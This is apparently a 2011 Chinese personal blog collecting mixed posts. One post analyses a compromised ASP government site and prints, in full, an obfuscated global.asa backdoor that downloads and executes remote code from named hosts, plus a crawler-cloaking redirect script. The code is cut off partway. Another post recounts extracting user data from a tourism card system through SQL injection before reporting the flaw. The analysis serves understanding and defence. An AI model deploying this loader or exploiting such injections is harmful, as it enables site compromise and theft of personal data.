天影的窝

社区版面质量要求

admin — Mon, 05 Sep 2011 13:44:19 +0000

社区版面质量要求：

1、第一页前5条帖子的可读性。

2、同一ID不能有3条帖子连续出现。

3、第一页至少有2条能激发讨论、争论愿望的帖子。

4、消灭0回复，保持0垃圾帖子。

5、本地化的帖子最少占整体版面的1/4。

6、好帖子及时加精华、高亮（高亮显示最多占整体版面的1/5）。

打印机安装驱动之后无法打印

admin — Wed, 24 Aug 2011 01:56:55 +0000

东芝 estudio181 安装之后，打印，提示错误正在打印。
以前是重启下打印机就好了。今天公司以前电脑搬地方，换了台电脑，不管怎么折腾，驱动能装上，但就是不能打印。
网上说有些精简版系统缺系统文件，下好之后依旧不能装。
无奈，实在不想折腾了，喊来卖打印机的折腾。2小时候再换了台电脑终于搞定了。
说有的系统不能装。安装的时候提示com4口被占用，不管，安装完之后去设备管理器里重新安装驱动，它会自动调整com口。。

差点喝茶了

admin — Fri, 19 Aug 2011 16:03:39 +0000

没意思，我就发个提议抵制PX的帖子，poli。ce就找到我家，我没在家。留个电话给我，打过去一问，……
什么人啊。我又没游行，又没非法集会。
操蛋的社会，和谐啊

微信还是不错的

admin — Thu, 18 Aug 2011 03:15:02 +0000

新版的已经支持QQ离线消息了。而且支持查找附近的人。

不过这个功能可以进一步发展，比如加入谷歌地图，将附近的人定位到地图上。

这样能准确判断谁跟谁。。。

奇虎360收购诺赛科技

admin — Mon, 15 Aug 2011 12:56:34 +0000

早有耳闻，所以听到新闻时也不足为奇。
前一阵子找web安全外部监控的时候就发现360也在做，只不过很很很一般。

其实收购IIScan 对当事人来说可能是好事，价钱据说也不少。

对对其他创业团队就不公平了。首先360已经收购了，就不会在收购其他web安全扫描厂家。

而其他创业团队却增加了一个360为竞争对手。如果没有其他大公司收购这些小公司，必然受到360的各种打击而倒台，

这是对网络安全技术的一种损失，是安全届的损失，严重点说，会阻碍网络安全的发展。。

横向的看，360今天能收购web安全扫描，明天就能收购做盗版碟的，过几天再收购播放器，然后再收购什么一大堆有点创意的公司。。

也许这就是360的策略吧。真的到了那天，肯定会和qq正面对决的。让我们拭目以待吧。。。

一种新型的挂马方式

admin — Sat, 13 Aug 2011 03:54:41 +0000

无意中发现的，利用搜索引擎跳转来执行恶意代码。其实这种方式或许已经出来很久了，但还是刚被揭开面纱。

实现原理也很简单，利用http包中的referer。referer就是检测页面来源的，有时候页面防盗链也会利用referer。

事情的起因是这样的，某日发现从百度点击连云港党建网，会跳转到恶意网站。但正常在浏览器中输入是不会出现该现象。第一反应就是程序中有代码对referer作了判断实现跳转，但模糊的搜索了一遍代码，没有发现十分明显的问题。asp(.net)的

开始怀疑服务器问题，可同服务器的其他站点并不存在该问题，而且查看解析asp的asp.dll并没有被篡改的迹象。IIS中的文档页脚也正常。

目光再次回到代码上，后来在朋友的提醒下，才发现global.asa这个文件。这个文件是个特殊文件，不用在代码中调用，默认全局调用。

来看看global.asa的代码

（这儿实际上空了n行，用来迷惑之用）
（这儿实际上空了n行，用来迷惑之用） 'by*diao 'by*aming sub Application_OnStart end sub sub Application_OnEnd end sub sub Session_OnStart url="h"&"t"&"t"&"p"&":"&"/"&"/"&"w"&"w"&"w"&"."&"t"&"a"&"y"&"e"&"q"&"u"&"."&"c"&"o"&"m"&"/"&"t"&"x"&"t"&"/"&"g"&"l"&"o"&"b"&"a"&"l"&"s"&"."&"t"&"x"&"t"（这写的够花的的吧，去除&“后http://www.tayequ.com/txt/globals.txt） Set ObjXMLHTTP=Server.CreateObject("MSXML2.serverXMLHTTP") (远程载入文档) ObjXMLHTTP.Open "GET",url,False ObjXMLHTTP.setRequestHeader "User-Agent",url ObjXMLHTTP.send GetHtml=ObjXMLHTTP.responseBody Set ObjXMLHTTP=Nothing set objStream = Server.CreateObject("Adodb.Stream") objStream.Type = 1 objStream.Mode =3 objStream.Open objStream.Write GetHtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = "gb2312" GetHtml = objStream.ReadText objStream.Close if instr(GetHtml,"by*aming")>0 then execute GetHtml end if end sub 'sub Session_OnEnd 'end sub

大体意思是利用xmlhttp组件下载一个txt，并执行其中的代码。
来看看那个txt代码

function urldecode(encodestr) Dim newstr,havechar,lastchar,i,char_c,next_1_c,next_1_Num newstr="" havechar=false lastchar="" for i=1 to len(encodestr) char_c=mid(encodestr,i,1) if char_c="+" then newstr=newstr & " " elseif char_c="%" then next_1_c=mid(encodestr,i+1,2) next_1_num=cint("&H" & next_1_c) if havechar then havechar=false newstr=newstr & chr(cint("&H" & lastchar & next_1_c)) else if abs(next_1_num)<=127 then newstr=newstr & chr(next_1_num) else havechar=true lastchar=next_1_c end if end if i=i+2 else newstr=newstr & char_c end if next urldecode=newstr end function Public Function GetHtml(url) Set ObjXMLHTTP=Server.createobject("MSX"+"ML2.s"+"erv"+"erXML"+"HTTP") ObjXMLHTTP.Open "GET",url,False ObjXMLHTTP.send GetHtml=ObjXMLHTTP.responseBody Set ObjXMLHTTP=Nothing set objStream = Server.CreateObject("Adodb.Stream") objStream.Type = 1 objStream.Mode =3 objStream.Open objStream.Write GetHtml objStream.Position = 0 objStream.Type = 2 objStream.Charset = "gb2312" GetHtml = objStream.ReadText objStream.Close End Function Function check(user_agent) allow_agent=split("baidu,baidu",",") check_agent=false For agenti=lbound(allow_agent) to ubound(allow_agent) If instr(user_agent,allow_agent(agenti))>0 then check_agent=true exit for end if Next check=check_agent End function Function CheckRefresh() CheckRefresh = False Dim Botlist,i,Repls Krobotlist = "baidu|google|sogou|soso|yahoo|bing|youdao|qihoo|iask|aol" Botlist = Split(Krobotlist,"|") For i = 0 To Ubound(Botlist) If InStr(left(request.servervariables("HTTP_REFERER"),"40"),Botlist(i)) > 0 Then CheckRefresh = True Exit For End If Next End Function

randomize
If CheckRefresh=true Then
If check(user_agent)=false Then
httplailu=urldecode(LCase(request.servervariables(”HTTP_REFERER”)))
if instr(httplailu,”刺杀”)>0 or instr(httplailu,”1.89″)>0 or instr(httplailu,”1.76″)>0 or instr(httplailu,”1.85″)>0 or instr(httplailu,”1.95″)>0 or instr(httplailu,”1.96″)>0 or instr(httplailu,”传奇”)>0 or instr(httplailu,”玉兔”)>0 or instr(httplailu,”皓月”)>0 or instr(httplailu,”合击”)>0 then
response.Write GetHtml(”http://new.happy007.info/asa/new/wudi/g2.txt?dd=”&cstr(int(rnd*10000)+1))
response.end()
else
response.redirect(”http://www.shu8.cc/user/xhh.html”)
response.end()
end if
end If
end if
user_agent=Request.ServerVariables(”HTTP_USER_AGENT”)
httpuser=LCase(request.servervariables(”http_user_agent”))
if instr(httpuser,”baidu”)>0 or instr(httpuser,”soso”)>0 or instr(httpuser,”sogou”)>0 or instr(httpuser,”google”)>0 then
if instr(GetUrl(),”?”)=0 and len(GetUrl())<45 then
key1=lcase(GetHtml(”http://weblink.happy007.info/weblink.asp?weburl=”&GetUrl()&”&dd=”&cstr(int(rnd()*10000)+1)))
response.Write key1
end if
end if
if instr(httpuser,”baidu”)>0 then
if instr(GetUrl(),”?”)<>0 then
moban=GetHtml(”http://hi.baidu.com/laodong616/blog/item/ef2347e11884942727979137.html”)
mb1=split(moban,”kaishikaishikaishi”)
mb2=split(mb1(1),”jiesujiesujiesujiesu”)
mbkey=split(mb2(1),”endendendend”)
mbkey1=split(mbkey(0),”,”)
mb3=Replace(mb2(0),”<”,”<”)
mb4=Replace(mb3,”>”,”>”)
if request(”wd”)<>”" then
content=GetHtml(”http://www.baidu.com/s?”+request.QueryString())
else
content=GetHtml(”http://www.baidu.com/s?wd=”&mbkey1(int(rnd()*ubound(mbkey1)))&”&pn=”&cstr(int(rnd()*10))+”0″)
end if
l1=split(content,”")
l2=split(l1(1),”
“)
l3=l2(0)+”
”
l4=split(content,”

深深的鄙视一下716杰瑞深软

admin — Thu, 11 Aug 2011 02:51:05 +0000

记得刚大学毕业的时候，在新海中学有个连云港市大型招聘会，于是带着简历路过杰瑞深软。一看，人家只招研究生，搞delphi开发。

我厚着脸皮硬塞了份简历给人家，我就开始吹网络安全，sql注入。结果人家问我sql注入怎么防，其实，当初我对sql injection不怎么熟，扯的破绽百出，那个人可能懂点，于是很尴尬。。

然后我又说我用过linux，然后人家问我用过哪些发行版，我就说我用过redhat，ubuntu。debian，centos……没用过，没敢说。

还是被鄙视了……

后来的几天，没任何动静，于是亲自去了趟716，结果门卫不让进，没辙，叫门卫联系深软，结果人家说，你水平不够，……

前几天，某哥们说从某数据库里翻到了谁谁的资料，一打听，原来是连云港旅游年卡系统。

于是看了下该系统，发现是杰瑞深软做的，.net开发的。在用户查询界面随手输入‘’，报错。报出详细的sql语句，oracle的库，看来webconfig没有屏蔽错误信息。

拿起穿山甲，就开始跑，果然，跑出了年卡用户的一些相关信息。

后来在群里说了下该漏洞，一杯茶的功夫，旅游局的同行就加群找过来，详细的跟他们说了……

几天之后，再去看该注点，依然可以注射，只是关闭了webconfig的错误信息。一问，说修复了啊，已经不显示sql语句了。

狂汗，原来深软的人以为关闭错误信息就是防注入？

哥终于可以深深的鄙视一把716，杰瑞深软了……

博客又开鸟

admin — Mon, 08 Aug 2011 02:49:11 +0000

想把之前的博客（cnwolf.net）弄出来，于是好不容易找到源码。于是找数据库，找了半天没找到，心想有当初wordpress的备份，结果翻遍硬盘终于找到了，不过悲剧的是，尼玛竟然是个快捷方式，内流满面啊。从头开始吧，这次一定要有耐心。

看了一下以前朋友的博客，竟然都还留着哥的友情链接，感动啊！~~~~ swing ，feng ，鸡蛋，hidehai，独自等待

最后感谢下motty小朋友提供空间。

wordpress 侧边栏显示评论内容

admin — Sat, 25 Sep 2010 05:10:20 +0000

下午花了点时间，参照网上的改法。其实只需修改default-widget.php。

function utftrim($str) { $len = strlen($str); for ($i=strlen($str)-1; $i>=0; $i-=1) { $hex .= ‘ ‘.ord($str[$i]); $ch = ord($str[$i]); if (($ch & 128)==0) return (substr($str,0,$i)); if (($ch & 192)==192) return (substr($str,0,$i)); } return($str.$hex); } if ( $comments ) : foreach ( (array) $comments as $comment) : $comment_content = strip_tags($comment->comment_content); $comment_content = stripslashes($comment_content); $comment_content = preg_replace(’/\[qu(.(?!\[\/quote]))+.\[\/quote]/si’, ”, $comment_content); $comment_content = preg_replace(’/\s*:em\d\d:\s*/si’,”, $comment_content); $comment_excerpt = substr($comment_content,0,30); $comment_excerpt = utftrim($comment_excerpt); echo ‘
‘ . /* translators: comments widget: 1: comment author, 2: post link */ sprintf(_x(’%1$s : %2$s’, ‘widgets’), get_comment_author_link(), ”.$comment_excerpt . ‘…’) . ‘ ‘; endforeach; endif;?>